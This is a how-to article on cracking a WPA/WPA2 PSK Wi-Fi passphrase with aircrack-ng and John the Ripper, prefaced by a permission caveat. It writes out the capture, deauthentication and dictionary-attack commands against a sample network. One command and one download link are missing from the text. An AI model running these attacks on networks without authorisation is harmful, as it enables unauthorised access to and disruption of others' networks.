This article demonstrates how to crack a wireless network using the AirCrack-NG suite. Note that this will only work with WPA/WPA2 PSK wireless networks. That’s the limits of this generation of the AirCrack-NG suite. Only do this on a network that you own or are responsible for and have permission to test in this way.
This article is based on Fedora 32 64bit running on a Lenovo Thinkpad T490s.
Install the software:
yum install aircrack-ng
Take down your wireless device. In my case, the wifi device is “wlp0s20f3”:
ifconfig wlp0s20f3 down
Do a site survey:
The above gives you enough insight into the wireless networks around you. Identify the one you want to target. For this example, we’ll be using the wireless network with ESSID “MYWIFI”. Monitor that wireless network for authenticating devices, that’s the weak point. Note that I can see from the survey that the access point is using channel 11 (amongst others) so I use the “-c 11” in the command below.
airodump-ng wlp0s20f3 -c 11 --essid MYWIFI -w psk
From the above command output, the top-left column lists the BSSID. Pick one, that’ll be our target.
While the above is still running, trigger a device that’s already on that wireless network to de-authenticate which triggers a re-authentication process.
In another window (while the above command is still running). Notice the BSSID (MAC address) in the following command. This BSSID was taken from the step above. For me, it’s “E0:32:FA:0A:F6:06”.
aireplay-ng -0 1 -b E0:32:FA:0A:F6:06 -e MYWIFI wlp0s20f3
The “airodump” command above should now show a “WPA handshake: E0:32:FA:0A:F6:06” message at the top of the window. A device has re-authenticated which is exactly what we wanted.
Now you can cancel the “airodump” command. There will be a “.cap” file in the current directory. That’s the file of interest to us. If you’ve done this several times, get the name of the most recent “.cap” file.
Crack the passphrase using the following command. The “password.lst” file may be in a different location than in this example. Also you can download other password lists from:
aircrack-ng psk-01.cap -w /usr/share/doc/aircrack-ng-doc/password.lst
Optionally you can use John The Ripper to help crack the passphrase.
Install the software:
yum install john
Crack the passphrase:
john --wordlist=passwords.list --rules --stdout | aircrack-ng -e MYWIFI -w - psk-01.cap
If you need to cancel (pressing Control+C, for example) and continue later, the following command (run from the same directory) will continue from where John The Ripper reached previously:
john --restore | aircrack-ng -e MYWIFI -w - psk-01.cap